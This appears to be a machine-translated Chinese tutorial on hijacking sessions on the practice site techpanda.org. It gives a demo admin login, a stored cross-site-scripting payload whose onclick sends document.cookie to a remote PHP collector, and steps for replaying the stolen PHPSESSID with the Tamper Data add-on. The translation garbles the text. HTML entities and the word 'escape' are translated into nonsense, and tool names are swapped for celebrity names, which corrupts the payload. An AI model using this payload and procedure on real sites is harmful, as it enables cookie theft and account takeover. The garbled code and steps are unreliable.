在这个实际场景中,我们将劫持位于www.techpanda的网站。com组织(可能需要访问互联网)。我们将使用跨站单击脚本以获取cookie会话ID,然后使用它模拟合法的用户会话。
假设攻击者可以访问web应用程序,并希望劫持使用同一应用程序的其他用户的会话。假设攻击者的访问帐户受到限制,此攻击的目标可能是获得对web应用程序的管理访问权限。
准备好开始了吗
- 打开http://www.techpanda.org/
- 登录电子邮件是admin@google.com,密码是password2010
- 如果您已成功登录,您将跳转到下一页
- 单击添加新联系人
- 输入以下作为名字
&书信电报;ahref=#onclick=";文件.地点=';http://techpanda.org/DeHuaLiu_sess_uid.php?c=';+逃跑(document.cookie);">;黑暗<;/a>;
上面的代码使用JavaScript,它添加了一个带有onclick事件的超链接。当不知情的用户点击链接时,事件将检索PHPcookie会话ID,并将其与URL_sess_uid.PHP页面中的会话ID一起发送给AndyLau
- 输入剩余的详细信息,如下所示
- 单击保存更改
- 现在,您的仪表板将如下所示
- 由于跨站点脚本代码存储在数据库中,因此每次具有访问权限的用户登录时都会加载该代码
- 假设管理员登录并单击显示为黑色的超链接
- 我们将在URL中获得一个显示会话ID的窗口
小心:脚本可以将值发送到存储phpsessid的远程服务器,然后将用户重定向回网站,就好像什么都没发生一样。
使用Firefox和NicholasTse数据插件模拟会话
以下流程图显示了完成此练习必须采取的步骤。
- 你需要Firefox网络浏览器和NicholasTse数据插件来完成这一部分
- 打开Firefox并安装add,如下图所示
- 搜索篡改数据并单击安装,如上图所示
- 单击“接受并安装”
- 安装完成后,单击“立即重新启动”
- 如果菜单栏未显示,请启用它
- 单击工具并选择篡改数据,如下所示
- 您将看到下面的窗口。点击清除按钮。注意:如果窗口不是空的
- 点击开始Tamper
- 切换回Firefoxweb浏览器并输入http://www.techpanda.org/dashboard.php,然后按enter键加载页面
- 您将从篡改数据中获得以下弹出框
- 弹出窗口有三个选项。NicholasTse选项允许您在将HTTP头提交到服务器之前修改它。
- 点击它,你会看到下面的窗口
- 复制从攻击URL复制的PHP会话ID,并将其粘贴在等号后面。现在你的价值应该是这样的
pPSessid=2DVLTIP2N8LDBN11B2RA76LM2
- 点击OK按钮
- 您将再次看到篡改数据弹出窗口
- Tamper复选框
- 完成后,单击submit按钮,您应该可以看到以下信息
注意:我们没有登录。我们使用跨站点脚本检索到的phpsessid值模拟了登录会话
希望您能通过本文对网络渗透有一个初步的了解。
跟着我读更多精彩的文章
最新评论